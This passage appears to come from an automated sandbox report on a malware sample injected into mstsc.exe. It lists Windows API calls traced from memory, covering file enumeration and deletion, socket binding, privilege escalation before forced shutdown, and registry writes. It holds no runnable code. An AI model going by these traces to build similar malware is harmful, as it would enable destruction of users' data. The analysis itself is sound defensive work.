    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006289A
    • HeapFree.KERNEL32(00000000), ref: 0006289D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000628B1
    • HeapFree.KERNEL32(00000000), ref: 000628B4
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000628C2
    • HeapFree.KERNEL32(00000000), ref: 000628C5
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000628D6
    • HeapFree.KERNEL32(00000000), ref: 000628D9
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 00061E30
    • HeapAlloc.KERNEL32(00000000), ref: 00061E39
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 00061E41
    • HeapAlloc.KERNEL32(00000000), ref: 00061E44
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 00061E4C
    • HeapAlloc.KERNEL32(00000000), ref: 00061E4F
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 00061EB2
    • HeapAlloc.KERNEL32(00000000), ref: 00061EB5
    • GetCurrentProcessId.KERNEL32 ref: 00061ECC
    • GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00061F59
    • HeapAlloc.KERNEL32(00000000), ref: 00061F5C
    • GetCurrentProcessId.KERNEL32 ref: 00061F73
    • GetProfilesDirectoryW.USERENV(?,00000104), ref: 00061FA9
    • wsprintfW.USER32 ref: 00061FC6
    • FindFirstFileW.KERNEL32(?,?), ref: 00061FD9
    • StrCmpW.SHLWAPI(?,000704E4), ref: 00061FF9
    • StrCmpW.SHLWAPI(?,000704E8), ref: 00062013
    • StrCpyW.SHLWAPI(?,?), ref: 0006204E
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00062058
    • HeapAlloc.KERNEL32(00000000), ref: 0006205B
    • GetProcessWindowStation.USER32 ref: 00062072
    • StrCatW.SHLWAPI(?,00000000), ref: 0006209D
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 000620D8
    • HeapAlloc.KERNEL32(00000000), ref: 000620DB
    • GetDoubleClickTime.USER32 ref: 000620EF
    • wsprintfW.USER32 ref: 0006212A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062145
    • HeapFree.KERNEL32(00000000), ref: 0006214E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00062156
    • HeapFree.KERNEL32(00000000), ref: 00062159
    • FindNextFileW.KERNEL32(00000000,?), ref: 00062179
    • FindClose.KERNEL32(00000000), ref: 00062184
    • GetProcessHeap.KERNEL32(00000008,00000049), ref: 000621F2
    • HeapAlloc.KERNEL32(00000000), ref: 000621F5
    • GetDialogBaseUnits.USER32 ref: 00062209
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00062238
      • Part of subcall function 0006DDBF: lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0006DDE5
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006DDFA
      • Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DDFD
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,?), ref: 0006DE20
      • Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DE23
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000250), ref: 0006DE3A
      • Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DE3D
      • Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(?,00000001), ref: 0006DE55
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006DE70
      • Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DE73
      • Part of subcall function 0006DDBF: GetProcessWindowStation.USER32 ref: 0006DE87
      • Part of subcall function 0006DDBF: lstrcatW.KERNEL32(?,00000000), ref: 0006DEB8
      • Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(00062247,00000001), ref: 0006DEC4
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006DEF5
      • Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DEF8
      • Part of subcall function 0006DDBF: GetOpenClipboardWindow.USER32 ref: 0006DF0C
      • Part of subcall function 0006DDBF: lstrcatW.KERNEL32(00062247,00000000), ref: 0006DF3D
      • Part of subcall function 0006DDBF: FindFirstFileW.KERNEL32(00062247,?), ref: 0006DF47
      • Part of subcall function 0006DDBF: lstrlenW.KERNEL32(79146553), ref: 0006DF7F
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0006DF9A
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006DF9D
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006DFAC
      • Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DFAF
      • Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0006DFCA
      • Part of subcall function 0006DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0006DFD4
      • Part of subcall function 0006DDBF: lstrcatW.KERNEL32(314C5341,79146553), ref: 0006DFED
      • Part of subcall function 0006DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0006E014
      • Part of subcall function 0006DDBF: DeleteFileW.KERNEL32(314C5341), ref: 0006E01F
      • Part of subcall function 0006DDBF: FindNextFileW.KERNEL32(sb0aVS,?), ref: 0006E035
      • Part of subcall function 0006DDBF: GetLastError.KERNEL32 ref: 0006E051
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E05D
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E066
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E06B
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E06E
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,77043129), ref: 0006E075
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E078
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,00062247), ref: 0006E082
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E085
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E091
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E094
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E0A0
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006E0A3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00062253
    • HeapFree.KERNEL32(00000000), ref: 0006225C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00062263
    • HeapFree.KERNEL32(00000000), ref: 00062266
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006226D
    • HeapFree.KERNEL32(00000000), ref: 00062270
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00062275
    • HeapFree.KERNEL32(00000000), ref: 00062278
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00062280
    • HeapFree.KERNEL32(00000000), ref: 00062283
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006228E
    • HeapFree.KERNEL32(00000000), ref: 00062291
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0006A1A4
    • HeapAlloc.KERNEL32(00000000), ref: 0006A1A7
    • ReleaseCapture.USER32 ref: 0006A1C2
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006A1F5
    • GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0006A206
    • GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006A258
    • HeapAlloc.KERNEL32(00000000), ref: 0006A25B
    • GetForegroundWindow.USER32 ref: 0006A272
    • wsprintfW.USER32 ref: 0006A2A6
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006A2E6
    • HeapAlloc.KERNEL32(00000000), ref: 0006A2E9
    • RevertToSelf.ADVAPI32 ref: 0006A300
    • CoInitializeEx.OLE32(00000000,00000006), ref: 0006A362
    • GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006A392
    • HeapAlloc.KERNEL32(00000000), ref: 0006A395
    • GetCapture.USER32 ref: 0006A3AC
    • GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006A40B
    • HeapAlloc.KERNEL32(00000000), ref: 0006A40E
    • GetDoubleClickTime.USER32 ref: 0006A422
    • LoadLibraryA.KERNEL32(57495761), ref: 0006A44C
    • GetProcAddress.KERNEL32(00000000), ref: 0006A453
    • GetLastError.KERNEL32 ref: 0006A45D
    • Sleep.KERNEL32(00000064), ref: 0006A46C
    • GetForegroundWindow.USER32 ref: 0006A472
    • CoUninitialize.OLE32 ref: 0006A48B
    • CloseHandle.KERNEL32(?), ref: 0006A494
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A4A3
    • HeapFree.KERNEL32(00000000), ref: 0006A4AC
    • GetProcessHeap.KERNEL32(00000000,57495761), ref: 0006A4B2
    • HeapFree.KERNEL32(00000000), ref: 0006A4B5
    • GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0006A4BB
    • HeapFree.KERNEL32(00000000), ref: 0006A4BE
    • GetProcessHeap.KERNEL32(00000000,31653832), ref: 0006A4C4
    • HeapFree.KERNEL32(00000000), ref: 0006A4C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006A4CD
    • HeapFree.KERNEL32(00000000), ref: 0006A4D0
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
      • Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
      • Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1
    • lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0006DDE5
    • GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006DDFA
    • HeapAlloc.KERNEL32(00000000), ref: 0006DDFD
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0006DE20
    • HeapAlloc.KERNEL32(00000000), ref: 0006DE23
    • GetProcessHeap.KERNEL32(00000008,00000250), ref: 0006DE3A
    • HeapAlloc.KERNEL32(00000000), ref: 0006DE3D
    • lstrcpyW.KERNEL32(?,00000001), ref: 0006DE55
    • GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006DE70
    • HeapAlloc.KERNEL32(00000000), ref: 0006DE73
    • GetProcessWindowStation.USER32 ref: 0006DE87
    • lstrcatW.KERNEL32(?,00000000), ref: 0006DEB8
    • lstrcpyW.KERNEL32(00062247,00000001), ref: 0006DEC4
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006DEF5
    • HeapAlloc.KERNEL32(00000000), ref: 0006DEF8
    • GetOpenClipboardWindow.USER32 ref: 0006DF0C
    • lstrcatW.KERNEL32(00062247,00000000), ref: 0006DF3D
    • FindFirstFileW.KERNEL32(00062247,?), ref: 0006DF47
    • lstrlenW.KERNEL32(79146553), ref: 0006DF7F
    • lstrcatW.KERNEL32(314C5341,79146553), ref: 0006DFED
    • GetLastError.KERNEL32 ref: 0006E051
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0006DF9A
      • Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006DF9D
      • Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006DFAC
      • Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DFAF
      • Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0006DFCA
      • Part of subcall function 0006DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0006DFD4
      • Part of subcall function 0006DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0006E014
    • DeleteFileW.KERNEL32(314C5341), ref: 0006E01F
    • FindNextFileW.KERNEL32(sb0aVS,?), ref: 0006E035
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E05D
    • HeapFree.KERNEL32(00000000), ref: 0006E066
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006E06B
    • HeapFree.KERNEL32(00000000), ref: 0006E06E
    • GetProcessHeap.KERNEL32(00000000,77043129), ref: 0006E075
    • HeapFree.KERNEL32(00000000), ref: 0006E078
    • GetProcessHeap.KERNEL32(00000000,00062247), ref: 0006E082
    • HeapFree.KERNEL32(00000000), ref: 0006E085
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006E091
    • HeapFree.KERNEL32(00000000), ref: 0006E094
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006E0A0
    • HeapFree.KERNEL32(00000000), ref: 0006E0A3
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0007CD20), ref: 0006BB67
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB70
    • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB86
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB89
    • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB9D
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BBA0
    • GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006BBE4
    • HeapAlloc.KERNEL32(00000000), ref: 0006BBE7
    • ReleaseCapture.USER32 ref: 0006BBF9
    • GetSystemDirectoryW.KERNEL32(0007CD24,00000103), ref: 0006BC4D
    • FindClose.KERNEL32(?), ref: 0006BDC4
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0007CD20), ref: 0006F60E
      • Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F611
      • Part of subcall function 0006F5D9: GetShellWindow.USER32 ref: 0006F62D
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F678
      • Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F67B
      • Part of subcall function 0006F5D9: GetLogicalDrives.KERNEL32 ref: 0006F68F
      • Part of subcall function 0006F5D9: GetModuleHandleA.KERNEL32(0006BF20,00000000), ref: 0006F6B9
      • Part of subcall function 0006F5D9: GetProcAddress.KERNEL32(00000000), ref: 0006F6C0
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F6D0
      • Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6DD
      • Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,0006BF20), ref: 0006F6E2
      • Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6E9
    • lstrcatW.KERNEL32(0007CD24,00000000), ref: 0006BC84
    • FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BC8E
    • StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0006BCD3
    • FindNextFileW.KERNEL32(?,?), ref: 0006BD84
    • FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BD90
    • GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0006BDDB
    • HeapFree.KERNEL32(00000000), ref: 0006BDDE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BDE8
    • HeapFree.KERNEL32(00000000), ref: 0006BDEB
    • GetProcessHeap.KERNEL32(00000000,0007CD24,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BDFA
    • HeapFree.KERNEL32(00000000), ref: 0006BDFD
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BE07
    • HeapFree.KERNEL32(00000000), ref: 0006BE0A
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 0006C600
    • socket.WS2_32(00000002,00000001,00000000), ref: 0006C60D
    • GetCurrentProcessId.KERNEL32 ref: 0006C622
    • GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006C675
    • HeapAlloc.KERNEL32(00000000), ref: 0006C67C
    • GetProcessWindowStation.USER32 ref: 0006C692
    • inet_addr.WS2_32(00000000), ref: 0006C6C1
    • htons.WS2_32(?), ref: 0006C6CC
    • bind.WS2_32(?,?,00000010), ref: 0006C6E7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C6F4
    • HeapFree.KERNEL32(00000000), ref: 0006C6FB
    • closesocket.WS2_32(?), ref: 0006C717
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C720
    • HeapFree.KERNEL32(00000000), ref: 0006C727
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00061D6F
    • HeapAlloc.KERNEL32(00000000), ref: 00061D72
    • GetMenuCheckMarkDimensions.USER32 ref: 00061D83
    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00061DAE
    • OpenProcessToken.ADVAPI32(00000000), ref: 00061DB5
    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 00061DC3
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00061DE2
    • ExitWindowsEx.USER32(00000006,00000000), ref: 00061DF1
    • ExitWindowsEx.USER32(00000004,00000000), ref: 00061E01
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061E06
    • HeapFree.KERNEL32(00000000), ref: 00061E09
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 000646A6
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 000646DA
    • GetCurrentProcess.KERNEL32(00000028,?), ref: 000646EA
    • OpenProcessToken.ADVAPI32(00000000), ref: 000646F1
    • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00064701
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 00064731
    • CloseHandle.KERNEL32(?), ref: 0006473C
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000001,00000000,00000005), ref: 00068119
    • HeapAlloc.KERNEL32(00000000), ref: 0006811C
    • GetShellWindow.USER32 ref: 00068138
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00068197
    • HeapAlloc.KERNEL32(00000000), ref: 0006819A
    • CreatePopupMenu.USER32 ref: 000681B6
      • Part of subcall function 000685E0: VirtualAlloc.KERNEL32(00000000,000681EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0006861B
      • Part of subcall function 000685E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068696
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000681FE
    • HeapFree.KERNEL32(00000000), ref: 00068207
    • GetProcessHeap.KERNEL32(00000000,00000008), ref: 0006820C
    • HeapFree.KERNEL32(00000000), ref: 0006820F
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00068252
    • HeapAlloc.KERNEL32(00000000), ref: 00068255
    • CountClipboardFormats.USER32 ref: 0006826A
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 000682B8
    • HeapFree.KERNEL32(00000000), ref: 000682C1
    • GetProcessHeap.KERNEL32(00000000,?), ref: 000682CC
    • HeapFree.KERNEL32(00000000), ref: 000682CF
    • GetProcessHeap.KERNEL32(00000000,00000008), ref: 000682D4
    • HeapFree.KERNEL32(00000000), ref: 000682D7
    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 00068317
    • HeapAlloc.KERNEL32(00000000), ref: 0006831A
    • GetMessageExtraInfo.USER32 ref: 0006832F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006837D
    • HeapFree.KERNEL32(00000000), ref: 00068386
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0006838D
    • GetProcessHeap.KERNEL32(00000008,00000016), ref: 000683D7
    • HeapAlloc.KERNEL32(00000000), ref: 000683DA
    • GetLastError.KERNEL32 ref: 000683EC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068435
    • HeapFree.KERNEL32(00000000), ref: 0006843E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068445
    • HeapFree.KERNEL32(00000000), ref: 00068448
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0006844F
    • HeapFree.KERNEL32(00000000), ref: 00068452
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068459
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068460
    • HeapFree.KERNEL32(00000000), ref: 00068469
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068470
    • HeapFree.KERNEL32(00000000), ref: 00068473
    • GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0006847A
    • HeapFree.KERNEL32(00000000), ref: 0006847D
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068484
    • HeapFree.KERNEL32(00000000), ref: 00068487
    • GetProcessHeap.KERNEL32(00000000,00000008), ref: 0006848C
    • HeapFree.KERNEL32(00000000), ref: 0006848F
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00068C1A
    • HeapAlloc.KERNEL32(00000000), ref: 00068C1D
    • GetShellWindow.USER32 ref: 00068C38
    • GetModuleHandleA.KERNEL32(00000000), ref: 00068C5E
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068C74
    • HeapFree.KERNEL32(00000000), ref: 00068C77
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00068CB0
    • HeapAlloc.KERNEL32(00000000), ref: 00068CB3
    • GetMessagePos.USER32 ref: 00068CD1
      • Part of subcall function 000677D7: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00067861
      • Part of subcall function 000677D7: SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00068D00), ref: 00067876
      • Part of subcall function 000677D7: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0006788E
      • Part of subcall function 000677D7: CloseHandle.KERNEL32(00000000), ref: 000678A7
      • Part of subcall function 000677D7: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00068D00), ref: 000678C0
      • Part of subcall function 000677D7: HeapFree.KERNEL32(00000000), ref: 000678C7
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068D1C
    • HeapFree.KERNEL32(00000000), ref: 00068D25
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068D2A
    • HeapFree.KERNEL32(00000000), ref: 00068D2D
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 00068D70
    • HeapAlloc.KERNEL32(00000000), ref: 00068D73
    • GetCaretBlinkTime.USER32 ref: 00068D8A
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068DDA
    • HeapFree.KERNEL32(00000000), ref: 00068DE3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068DEE
    • HeapFree.KERNEL32(00000000), ref: 00068DF1
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068DF6
    • HeapFree.KERNEL32(00000000), ref: 00068DF9
    • GetProcessHeap.KERNEL32(00000008,00000018), ref: 00068E3E
    • HeapAlloc.KERNEL32(00000000), ref: 00068E41
    • GetCapture.USER32 ref: 00068E55
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068EA0
    • HeapFree.KERNEL32(00000000), ref: 00068EA9
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068EB0
    • HeapFree.KERNEL32(00000000), ref: 00068EB3
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068EBA
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068EC5
    • HeapFree.KERNEL32(00000000), ref: 00068ECE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068ED5
    • HeapFree.KERNEL32(00000000), ref: 00068ED8
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068EDF
    • HeapFree.KERNEL32(00000000), ref: 00068EE2
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00068EE7
    • HeapFree.KERNEL32(00000000), ref: 00068EEA
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00061176
    • HeapAlloc.KERNEL32(00000000), ref: 00061179
    • CountClipboardFormats.USER32 ref: 0006119F
    • GetProcessHeap.KERNEL32(00000008,000000C1), ref: 000612C8
    • HeapAlloc.KERNEL32(00000000), ref: 000612CB
    • GetDialogBaseUnits.USER32 ref: 000612EA
      • Part of subcall function 000638F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0006131B,00000000,0006131B,00000000,00000001,?,0006131B,00020006), ref: 00063929
      • Part of subcall function 000638F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0006131B,0006131B,?,0006131B,00020006), ref: 0006393C
    • GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00061356
    • HeapAlloc.KERNEL32(00000000), ref: 00061359
    • GetDialogBaseUnits.USER32 ref: 00061372
    • GetProcessHeap.KERNEL32(00000008,00000019), ref: 000613C4
    • HeapAlloc.KERNEL32(00000000), ref: 000613C7
    • GetCurrentThreadId.KERNEL32 ref: 000613E0
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 0006143F
    • HeapAlloc.KERNEL32(00000000), ref: 00061442
    • ReleaseCapture.USER32 ref: 00061458
    • RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0006149A
    • RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 000614CE
    • RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00061500
    • RegCloseKey.ADVAPI32(00000006), ref: 00061505
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061515
    • HeapFree.KERNEL32(00000000), ref: 0006151E
    • GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00061524
    • HeapFree.KERNEL32(00000000), ref: 00061527
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0006152D
    • HeapFree.KERNEL32(00000000), ref: 00061530
